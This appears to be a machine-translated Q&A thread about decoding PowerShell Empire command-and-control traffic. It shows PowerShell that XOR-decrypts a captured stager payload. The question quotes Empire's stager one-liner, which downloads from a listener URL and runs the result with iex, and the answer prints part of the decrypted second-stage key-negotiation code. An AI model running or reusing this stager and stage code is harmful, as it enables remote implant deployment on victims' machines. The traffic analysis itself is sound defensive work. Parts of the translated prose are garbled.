解密Powershell帝國

Question

我在一個項目上工作，我想要採取兩件事：從stager的powershell命令和通信的pcap，並解碼命令和控制流。

這涉及到https://github.com/PowerShellEmpire/Empire

的Base64編碼解碼PowerShell命令如下：

'$wc=new-object system.net.webclient;$u=\'USERAGENT\';$wc.headers.add(\'user-agent\',$u);$wc.proxy = [system.net.webrequest]::defaultwebproxy;$wc.proxy.credentials = [system.net.credentialcache]::defaultnetworkcredentials;$k=\'SECRETKEYi=0;char[]]$b=([char[]]($wc.downloadstring("http://IPOFLISTENER/index.asp")))|%{$_-bxor$k[$i++%$k.length]};iex ($b-join\'\')' 

https://github.com/PowerShellEmpire/Empire/wiki/Staging

維基說，經驗豐富的人，這從有效載荷 '的index.asp' 被拉使用分段鍵進行XOR加密。所以鑑於我有這個穩定器和密鑰，我該如何恢復明文？

這是我到目前爲止有：

tshark的-nr〜/桌面/ stager.pcap -Y 「ip.id == 0x7ba9」 -T領域-e數據

384d17284214657e6e6030470e177709092a460c16506125281022510b57460c0d145d187d710e650f0e464a130f786e0d296d750b684525734d0270197f234a124159184f2e7e55231d37433f36280e181412193b7518140a302603475b3d5b3b553b076f7d79691d67016b5220351509560d1d2d435a321203374a05543e5a1b5e1c39533349556e0e44042f0a3622221945211c5e5b343a0e364648014a4d43632a1265094f5d6067017e284d1f292f224d111176687a692110602373550c3f7d2a7678185d1d01712e433f177a14153e5d3d121f66251015116a3e63406b0c61093f791a78513e5b3d083d0629041e34590c10627032050920463a48217e375c3c190d7963666e0e447d1e3a2e22114d197671030075731c63642f4e437a3f761d247b7d075321460a725c526c7c682c6c0b717c5a24365d616028794c135e1c380e65736155370e404352243f330e145d3d2c191113184978034e7b2b7b50712f6b0b7d0e79180840452f337a7a6c234c2f727e772a3603370339633d5c3b755718733e7f6227471d083f11033738224e2a1e415d197d2330733a5b3c49137d0d0e440e11142d6034083a0f3b003f4d14787b7266307d260f620d494e053c772b6b6d0e53433a5609082f0639321e247d217172673903340c64185b3e6027163a38460d787f387a00630e2536060b1e7462656466251e21006b23542b633b412a3f592f4f0b6a413706414314023b40661a3574761473331a503e5f03062d5d3a1e64147e696070365f0c1715201e2c7910261f67131223315a1a4e017b3b6a2f0275187a4221452d6239317a6a0d3f4e0d32545b341f2910774a085e1c46145d28650d11141c5859020e107413233564140c4567091d076b072c5b227b1b11426f44601b1e6002525a3a2c28022d2e617510735f05301438640f4e437a1f561d247b7d075d2f4b44144a1e61630529147078707703172505642271226530682b1862087c67166a3e174e506e727a5a1161786a11120e406e6925530008591f507d6a764a613917383e38287a707b435e6968442641571e277e551c380e657369622b523063392d3935353d7d172d191c6e0732024d195c015a137e30055731687c01700f0e582a386b7c410d313d1f79253d07174b4301276e56151724427d0e472d1a1f020b206709291a04173d7b50030740107a194e2b4550761c1f180a6f520d7f0d63323761631b0e07080d7e4d39735d637839431d5c1b555705732904670b5136432d163f1418301362187461130a331746076d2b4a2e6a16134f75030b6a6427082c11353f15436a2a3a55502e0729024f391a5308256b00386238671e007630083f113f0309035d311e5d76213028267e50002a6d38590c07621e58750a760a723502161477100d2f3c1f7d253204265119142f4c1a105b1e4538581d0f54014808417663192c00637b46566e1b0522470f481d063f5c1d63141e455f255a0104504109021f3e60171178717d7729070143014a5a1f4f446f413e04653e5f0b4718273b332d450d2b74135c2e37053b0d00491e0a521a29046509081c6a56060f47471e0271494c761854411327120a6d2d124a7a2d161d2e552f73601a1b40743d1476632a2c650b1a181c7b7725334c2952530c1a5d227b1873136d6e1e0e49352d7d607749623d060c1104363b721344144a6c3b16352e583a7e581313494c330a14676b4a127c1e74667d1d25140e2578046d1d6c59184f2e5e75031d37631f36280e3834071b2d4865143c2731621a5217063f5d0a0844245a64216001740a2a19221c3f662e3675503268440a754a074e731c412d0e6b7d1a1e600151135c1f7a000939040a1e7f512f1e406e60256f005c5e094f70121c6f63607e0b42195e78040e2e0b637f157405004e084613074a4d507f1c3f74245e553d1b404d191a737c6c 

這是十六進制對index.asp的響應的有效載荷。

分期關鍵是：〜8yK6] * 0N3d & | cZGLm）X_15 @ S`C＃記者：N（

特別是，我需要了解這一部分：

|%{$_-bxor$k[$i++%$k.length]};iex ($b-join\'\')' 

我知道，$ _是怎樣通過管道傳入的值時，BXOR與關鍵，$ķ異或的。我不知道剩下的做什麼。

Answer 1

你需要轉達將兩個字符串轉換爲通用格式。讓我們從關鍵開始。

假設〜8yK6] * 0N3d & | cZGLm）X_15 @ S`C＃記者：N（只是關鍵ASCII編碼，我們可以把它轉換回一個字節數組，像這樣：

# convert key string to [byte[]] 
$keyString = '~8yK6]*0N3d&|cZGLm)X_15@S`C#j:n(' 
$key  = [System.Text.Encoding]::ASCII.GetBytes($keyString) 

從tshark的加密有效載荷似乎是十六進制編碼幸運的是，十六進制字符串是相當簡單的轉換，因爲每對人物的代表byte：

# get ready to convert the encrypted stager payload from hex to [byte[]] 
$payloadHex = "384d17284214657e6e6030470e177709092a460c16506125281022510b57460c0d145d187d710e650f0e464a130f786e0d296d750b684525734d0270197f234a124159184f2e7e55231d37433f36280e181412193b7518140a302603475b3d5b3b553b076f7d79691d67016b5220351509560d1d2d435a321203374a05543e5a1b5e1c39533349556e0e44042f0a3622221945211c5e5b343a0e364648014a4d43632a1265094f5d6067017e284d1f292f224d111176687a692110602373550c3f7d2a7678185d1d01712e433f177a14153e5d3d121f66251015116a3e63406b0c61093f791a78513e5b3d083d0629041e34590c10627032050920463a48217e375c3c190d7963666e0e447d1e3a2e22114d197671030075731c63642f4e437a3f761d247b7d075321460a725c526c7c682c6c0b717c5a24365d616028794c135e1c380e65736155370e404352243f330e145d3d2c191113184978034e7b2b7b50712f6b0b7d0e79180840452f337a7a6c234c2f727e772a3603370339633d5c3b755718733e7f6227471d083f11033738224e2a1e415d197d2330733a5b3c49137d0d0e440e11142d6034083a0f3b003f4d14787b7266307d260f620d494e053c772b6b6d0e53433a5609082f0639321e247d217172673903340c64185b3e6027163a38460d787f387a00630e2536060b1e7462656466251e21006b23542b633b412a3f592f4f0b6a413706414314023b40661a3574761473331a503e5f03062d5d3a1e64147e696070365f0c1715201e2c7910261f67131223315a1a4e017b3b6a2f0275187a4221452d6239317a6a0d3f4e0d32545b341f2910774a085e1c46145d28650d11141c5859020e107413233564140c4567091d076b072c5b227b1b11426f44601b1e6002525a3a2c28022d2e617510735f05301438640f4e437a1f561d247b7d075d2f4b44144a1e61630529147078707703172505642271226530682b1862087c67166a3e174e506e727a5a1161786a11120e406e6925530008591f507d6a764a613917383e38287a707b435e6968442641571e277e551c380e657369622b523063392d3935353d7d172d191c6e0732024d195c015a137e30055731687c01700f0e582a386b7c410d313d1f79253d07174b4301276e56151724427d0e472d1a1f020b206709291a04173d7b50030740107a194e2b4550761c1f180a6f520d7f0d63323761631b0e07080d7e4d39735d637839431d5c1b555705732904670b5136432d163f1418301362187461130a331746076d2b4a2e6a16134f75030b6a6427082c11353f15436a2a3a55502e0729024f391a5308256b00386238671e007630083f113f0309035d311e5d76213028267e50002a6d38590c07621e58750a760a723502161477100d2f3c1f7d253204265119142f4c1a105b1e4538581d0f54014808417663192c00637b46566e1b0522470f481d063f5c1d63141e455f255a0104504109021f3e60171178717d7729070143014a5a1f4f446f413e04653e5f0b4718273b332d450d2b74135c2e37053b0d00491e0a521a29046509081c6a56060f47471e0271494c761854411327120a6d2d124a7a2d161d2e552f73601a1b40743d1476632a2c650b1a181c7b7725334c2952530c1a5d227b1873136d6e1e0e49352d7d607749623d060c1104363b721344144a6c3b16352e583a7e581313494c330a14676b4a127c1e74667d1d25140e2578046d1d6c59184f2e5e75031d37631f36280e3834071b2d4865143c2731621a5217063f5d0a0844245a64216001740a2a19221c3f662e3675503268440a754a074e731c412d0e6b7d1a1e600151135c1f7a000939040a1e7f512f1e406e60256f005c5e094f70121c6f63607e0b42195e78040e2e0b637f157405004e084613074a4d507f1c3f74245e553d1b404d191a737c6c" 
$payloadHexCount = $payloadHex.Length 

# create new [byte[]] for actual payload 
$payload = ,0 * ($payloadHexCount/2) 

for($i=0; $i -lt $payloadHexCount; $i+=2) 
{ 
    # convert each char pair to bytes 
    $payload[$i/2] = [System.Convert]::ToByte($payloadHex.Substring($i, 2), 16) 
} 

於是最後我們只需要ŧ o XOR二者：

# XOR the two byte arrays and concatenate the resulting bytes as char's 
$decryptedString = "" 
for ($i = 0; $i -lt $payload.Count; $i++){ 
    $decryptedString += [char]($payload[$i] -bxor $key[$i % $key.Length]) 
} 

Tada！有效負載解密：

PS C:\> $decryptedString 
FunctION STart-NEGoTIaTe{param($s,$SK,$UA="lol")ADD-TYpe -ASsEMbly SysTem.SeCUrITy;AdD-TYPe -aSsEmBLY SYSTeM.CoRE;$ErrorActionPreference = "SilentlyContinue";$e=[SYSTem.TeXT.EncOdING]::ASCII;$AES=NEw-OBJeCt SYSteM.SeCuRITY.CrYptOGRaphY.AesCRYpTOSErVicePrOVIdER;$IV = [bYte] 0..255 | GEt-RANdoM -counT 16;$AES.Mode="CBC"; $AES.Key=$e.GetBytes($SK); $AES.IV = $IV;$cSP = New-OBject SYStEM.SEcURity.CrYptOgrAphY.CsPPaRamEtErS;$cSP.FlaGs = $CSp.FLAgs -BOR [System.SecuRITy.CRyPTOGraPHY.CspPROvIdErFlAGs]::USeMACHInEKEyStore;$rS = NEw-OBjECT SYsTem.SeCURITY.CRyptOgRAPHy.RSACryptoSERVICEProvIDER -ARgUmentLIST 2048,$cSP;$Rk=$rs.ToXMLStRINg($FaLSe);$r=1..16|FOrEaCH-OBjEct{Get-RandoM -max 26};$ID=('ABCDEFGHKLMNPRSTUVWXYZ123456789'[$R] -JOin '');$ib=$E.GEtbytES($rk);$eb=$IV+$AES.CReaTEENcryPTOr().TRAnsformFINalBLOCk($Ib,0,$ib.LengTh);IF(-not $wc){$wC=New-ObJeCT SYstEm.NeT.WEbCLiENT;$Wc.PROxy = [System.NEt.WEbReQueST]::GETSYSTemWEbPRoXy();$WC.ProxY.CredenTIAlS = [SysTeM.NET.CreDEntiAlCacHe]::DEFauLTCrEDEnTIaLS;}$wc.Headers.Add("User-Agent",$UA);$wc.Headers.Add("Cookie","SESSIONID=$ID");$raw=$wc.UploadData($s+"index.jsp","POST",$eb);$DE=$e.GetStrING($RS.decrYPT($RAw,$fALSE));$EpoCh=$de[0..9] -joIN'';$KeY=$De[10..$DE.LengTh] -jOiN '';$AES=NEW-OBjEcT SystEM.SEcUrItY.CryPToGrAphy.AesCrypToSeRvICePROviDer;$IV = [byTE] 0..255 | GET-RANdoM -COUnt 16;$AES.Mode="CBC"; $AES.Key=$e.GetBytes($key);